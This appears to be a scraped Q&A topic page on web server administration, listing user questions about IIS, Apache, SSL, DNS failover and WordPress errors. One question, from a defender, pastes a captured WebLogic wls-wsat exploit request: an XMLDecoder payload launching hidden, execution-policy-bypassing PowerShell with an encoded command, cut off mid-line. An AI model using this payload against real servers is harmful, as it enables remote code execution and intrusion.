Web Servers





A web server refers to the software that helps to deliver web content that can be accessed either through the Internet or through an intranet. The primary function of a web server is to store, process and deliver web pages to clients. The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). The most common use of web servers is to host websites, but there are other uses such as gaming, data storage, running enterprise applications, handling email, FTP, etc.

Share tech news, updates, or what's on your mind.

Sign up to Post

In a meeting we were told that it is possible to know or identify if a user hit a specific page and it’s contents even if the page is locked.  We understand that when a page has a lock it means SSL and that the data to/fro from the site to computer is encrypted.  Is this possible that even thought the page has a lock, there is  a way to identify the encrypted page that the user visited and identify the contents, if it has form or just regular page?
Cloud Class® Course: Certified Penetration Testing
LVL 12
Cloud Class® Course: Certified Penetration Testing

This CPTE Certified Penetration Testing Engineer course covers everything you need to know about becoming a Certified Penetration Testing Engineer. Career Path: Professional roles include Ethical Hackers, Security Consultants, System Administrators, and Chief Security Officers.

Need advice on what to do when changing public domain names.
- Internal domain will not change [domain.local]
- External domain changing from www.domainA.com to www.DomainB.com
- multiple web servers with traffic on DomainA
- need to replicate same connections for DomainB
- I am sure to be missing some steps.....
- Email flow currently goes to mail.DomainA.com

I am surely missing things and need to help identifying these missing pieces. Also, I am fairly certain I need to do something with IIS in Exchange but do not know.

Please advise in any way. Ask questions or for clarifications - I will respond as promptly as possible.
I am working for a utility company. For hosting we use Linode right now.

I wanted to set up some form of redundancy in the event that the website goes down.

So I was thinking about using failover. As I understand I would need two (or more) web servers and two DNS servers. Is this correct?/

I was going to have one web server with Linode and one with AWS. For DNS I was going to have one with Linode and one with AWS.

Does this sound like a good setup?
Hi there.
(This is on Windows Server 2012 / 2016, IIS 9/10)
I'm trying to create a simple script to automate creating websites  (so the website name is also the App Pool name and folder name);
however, i'm having issues creating an SSL binding.
The wildcard certificate already exists and adding the actual certificate to IIS does not need to be automated. I just want to add a 443 / https binding and link it to the existing wildcard certificate (*.contoso.com)

My existing script works if i want to make http sites with no mention of SSL:

$siteName = "TestSite555"

$path = "C:\inetpub\wwwroot\$siteName"
$hostHeader = "$siteName.contoso.com"
New-Item $path -type Directory
New-WebAppPool $siteName
New-Website -Name $siteName -Port 80 -HostHeader $hostHeader -PhysicalPath $path -ApplicationPool $siteName

#how do I add the existing *.contoso.com wildcard and create an https://Testsite555.contoso.com binding?

#Thanks very much for reading
I have a Wordpress site hosting on Azure Web App that is running for few years. There were times accessing the site seeing server error but recovered by itself. Its php_errors.log is having multiple errors of the following:
WordPress database error Table 'mydatabase.wp_termmeta' doesn't exist for query SELECT term_id, meta_key, meta_value FROM wp_termmeta WHERE term_id IN (2) ORDER BY meta_id ASC made by require('D:\home\site\wwwroot\wp-blog-header.php'), require_once('D:\home\site\wwwroot\wp-includes\template-loader.php'), include('D:\home\site\wwwroot\wp-content\themes\myTheme\messages.php'), get_header, locate_template, load_template, require_once('D:\home\site\wwwroot\wp-content\themes\myTheme\header.php'), wp_nav_menu, wp_get_nav_menus, get_terms, WP_Term_Query->query, WP_Term_Query->get_terms, update_termmeta_cache, update_meta_cache
PHP Fatal error:  Cannot redeclare wp_kses() (previously declared in D:\home\site\wwwroot\wp-includes\kses.php:526) in D:\home\site\wwwroot\wp-includes\kses.php on line 526

Open in new window

I am not sure whether any of these errors is the cause of the issue but I came across this post at https://digwp.com/2011/11/clean-up-cannot-redeclare-hack/ saying it could be a hack, but there is no such "gzun".

1. How to check what could be the issue of such symptom that the site is having error and recovered by itself?
2. What are the symptoms of the errors as in the log? How to fix the errors?
Hello, I am about to configure a backup server to my main hosting server.

The main server is a Centos LAMP gigabit server hosting many websites, they are enough now to allow me to afford a backup server.

So, I was wondering, is there a smart, fast way to keep two Centos 6 servers synchronized? I mean everything, from packets to settings and so on, not only website folders and databases.

Is there a way to automatize such a thing, or am I dreaming? Are there ways that almost get there, at least?


For some reasons I need to access https://api.postcodeapi.nu/ with http instead of https. I have created a reverse proxy in my Apache as following:

ServerName api.postcodeapi.nu.local
SSLProxyEngine on
ProxyPass / https://api.postcodeapi.nu/
ProxyPassReverse / https://api.postcodeapi.nu/

Open in new window

Added following line in /etc/hosts      api.postcodeapi.nu.local

Open in new window

and accessing with curl but get Bad gateway:

# curl http://api.postcodeapi.nu.local
<title>502 Bad Gateway</title>
<h1>Bad Gateway</h1>
<p>The proxy server received an invalid
response from an upstream server.<br />

Open in new window

I have Windows Server 2012 R2 configured with IIS, MySQL and PHP for hosting basic HTML5/PHP Bootstrap sites and a number of Wordpress sites.

Which CPU is better for this sort of use, and why?

  •    Intel i7-3615QM @ 2.3GHz
  •    Intel i5-4570 @ 3.2GHz

Both are running 16GB DDR3 RAM.
I assume that the "url" parameter in XMLHttpRequest.open(method, url) must either be a relative path on the current domain, static IP (with or without path if needed)  or FQDN (with or without path if needed). Also I assume if different sub-domains then CORS needs to be setup. Am I missing anything?  Reason I'm asking is because I'm trying to work with a team building a new service and they keep giving me new location instances to test against like: "//001l60fbadm:10001/marketingcampaigns/api/v1/campaigns" for the URL but it is internal and I can't connect. What exactly do I communicate to the team creating the service as far as the needs so I can connect? I get a "method  : options" on the failed network call.

I am a newbie to the web development world and I need help from time to time. Right now I am trying to send a csv file in email an attachment. I am able to generate the csv file but I can't figure out the code to tell it to send or even where to put the code...

I am sure that phpmailer is my answer somehow, I have already downloaded all the phpmailer files. I have read so many different options but they don't really give step by step answers.
Cloud Class® Course: SQL Server Core 2016
LVL 12
Cloud Class® Course: SQL Server Core 2016

This course will introduce you to SQL Server Core 2016, as well as teach you about SSMS, data tools, installation, server configuration, using Management Studio, and writing and executing queries.

On my Bluehost shared server, I see folders that I think can probably be deleted. Examples are:


Which I think are left over from the migration they did from Godaddy.

Also, in my dev directory, dev.mysite.com, I see


and finally I see:
/public_html/intranet as well as

I think one of those could go. So two part question: 1. Do you think I could safely delete those folders (after finding out for sure which one holds the actual intranet files)?
2. Would it make a difference to the performance of the sites that are on the shared server?

We're on the Business Pro cloud plan. We're running wordpress on all these sites.
The management team here wants a discussion board in SharePoint that will allow all employees to post questions related to just about anything regarding the organization.  That's easy enough.  But, management also wants only themselves to be the ones whom can reply.  This is understandable because they don't want just anyone to be able to respond to a question about what the current company benefits are, for instance.

In short, I want all to be able to be able to create a new discussion but only a small group of people to be able to reply.

I thought I might be able to do this with permissions or views, but I just don't see a way to do it.

Any ideas?  I am using Office365 SharePoint
I have two applications running under the default website I need to allow users to access. This is a canned application(s) that were installed onto the server via an MSI. Currently to access the website/applications users go to servername.domain.com/appname and the webpage launches. I don't want users seeing the server name and or path. I would like to publish a DNS record so they can enter either appname.com or appname.domainname.com to access the webpage/applications. There are a total of 3 applications that run under the default website two of which users will be accessing.

I can do the DNS side but have no experience with the IIS and website side of things.

Thank you
Running WordPress site on IIS 10 from localhost using actual host-name simultaneously with the real site.

I have a site running on Apache ("site.com", ip: IP1) connecting to database ( DB1)

I am planing to move the site from apache to IIS10, I already moved the files.
Can I have a URL ("site.com", looking at localhost not going through internet) connecting to the same database ( DB1)

So that I can make sure its working before connecting the real IP. Not sure if this makes sense.

Wireshark capture on Oracle remote command execution attempt

experts, I captured the packet of an exploit attempt on my oracle weblogic server.

I am not able to decode the powershell command. It appears to be base64 encoded.  Can anyone tell me why I can't decrypt it?

Contents of the TCP stream below:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
    <void index="1">
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E …
I am trying to enable SSL on my Ubuntu server running Apache2, but when I restart the Apache2 service it crashes silently.

I have a cloned copy of the Ubuntu server in my Dev location and I was able to apply this without any issues.

I made, what I think is the correct edits to the /etc/apache2/sites-enable/site-name.com.conf file.
Can someone please shed some light on this for me.

    ServerAdmin webmaster@localhost
    ServerName www.contoso.com
    ServerAlias  contoso.com
    DocumentRoot /var/www/www.contoso.com/web
    SSLEngine on    
    SSLCertificateFile /etc/apache2/cert/contoso.crt
    SSLCertificateKeyFile /etc/apache2/cert/contoso.key
    SSLCertificateFile /etc/apache2/cert/gd_bundle-g2-g1.crt
        Options FollowSymLinks
        AllowOverride All
    <DIRECTORY /var/www/www.contoso.com/web>
        Options +FollowSymLinks
        AllowOverride All
        #AuthType Basic
        #AuthName "Restricted Content"
        #AuthUserFile /etc/apache2/.htpasswd
        #Require valid-user

        # <IfModule mod_rewrite.c>
        # RewriteEngine On
        # RewriteBase /
        # RewriteCond %{REQUEST_FILENAME} -f [OR]
        # RewriteCond %{REQUEST_FILENAME} -d
        # RewriteRule ^.*$ - [S=40]
        # RewriteRule (.*)/(.*)/$ /index.php?page=$1&id=$2 [QSA,L]
        # RewriteRule (.*)/$ /index.php?page=$1 [QSA,L]
        # </IfModule>
        # php_value auto_prepend_file 

Open in new window

We have a problem with the new IIs in Windows 2012 R2. On prior versions of IIs we added two sites point the same IP and port 80 for one domain for the www.anydomain.com and the other for its anydomain.com (without WWW) and worked perfectly when you called the domain with WWW and without WWW. Now in windows 2012 R2, first we can’t add that two sites pointing to same IP and because windows 2012 R2 reject that. Then we added a site www.anydomain.com and inside that site we configured bindings to point port 80, one  both www.anydomain.com and other domain.com, but when we call the page like anydomain.com not work, just work if you put with WWW, in other words, www.anydomain.com

How can we configure the anydomain.com (without WWW), also?

Thank you
Dear Experts

looking for the entry level or mid range server for web based application and maximum users working on this application not more than 25 users, please suggest cost effective Dell server or IBM , thanks in advance.
I'm trying to understand how DMZ work in a Windows environment ...

So I've got my LAN, no problems with that. Now I want to put a Windows web server into a DMZ.
I've configured a VLAN for the DMZ, that works. But I'm unsure about the necessary policies on my (Watchguard) firewall regulating the traffic between DMZ and LAN:

- I'd like to be able to access the web server from the LAN using Windows Explorer. Is that possible? If yes, how?
- does the web server need to be in the local AD in order to achieve this?
- can the web server in the DMZ use a serial number distributed by the KMS server on the LAN? Or how is this being handled? [update: I got that to work]
- what if the web server in the DMZ needs to execute a query on an MSSQL server on the LAN? Do I just open the port for SQL connections? I guess using a cache DB on another server in the DMZ would be better?
- how can I RDP from the LAN to the DMZ? RDP tells me the server does not exist although I have open the RDP port on the firewall ...

Cloud Class® Course: Microsoft Exchange Server
LVL 12
Cloud Class® Course: Microsoft Exchange Server

The MCTS: Microsoft Exchange Server 2010 certification validates your skills in supporting the maintenance and administration of the Exchange servers in an enterprise environment. Learn everything you need to know with this course.

Hi, the server for my site is set to disallow frames. Site is https://   magickitchen.com.

Is it possible to use an htaccess file to allow iframes within one directory? If so, how? Thanks in advance

I am looking for a reliable online system that hosts emails only.
My client is being bombarded with spam and needs a secure email system.
Also would you suggest changing the domain to stop all the spam?

We have our corporate public website hosted on an internal server. We want to use Amazon Route 53, and the Health Checks feature to monitor this website, and automatically redirect visitors to an "under maintenance" page (hosted in an S3 bucket) in the event that the primary site goes down.

I have everything working like this:
- Route53 PRIMARY record: mydomain.com --> [IP Address of internal Web Server]
- Route53 SECONDARY record: mydomain.com --> [ALIAS for S3 bucket mydomain.com] --> S3 Web Redirect for all requests --> maintenance.mydomain.com (S3 bucket)

This all works great. If the primary goes down, visitors are redirected to maintenance.mydomain.com.

However, the problem is that browsers seem to be caching the redirect and maintenance page, so even once Route53 has switched back to the PRIMARY record, if the visitor tries to go back mydomain.com, they go straight back to the maintenance.mydomain.com page. Even closing and opening the browser doesn't help. Only manually clearing the browser cache, or switching to a different browser seems to help.

Any idea on how I could change anything to get the 'failback' working better?
Security implications using: Automatic Logon with Current Username and Password in Internet Explorer
I have a website on a self hosted centos server. When doing a page speed test through google I get a message that it takes 5.8 seconds for the website server to respond where it is supposed to respond within 200ms. How do I get to the bottom of this load time?

We staged this website on another URL on a shared hosting server with much less resources but it performs much better.

WHM Centos Version : 68.0.36
Apache : 2.4.27
SQL : 5.6.38

Problem URL : www.luckystar.africa ( 5.8 server response )
Staging Server : www.madproducitons.co.za ( 800ms server response )
How to create website? what's the procedure and cost?

Web Servers





A web server refers to the software that helps to deliver web content that can be accessed either through the Internet or through an intranet. The primary function of a web server is to store, process and deliver web pages to clients. The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). The most common use of web servers is to host websites, but there are other uses such as gaming, data storage, running enterprise applications, handling email, FTP, etc.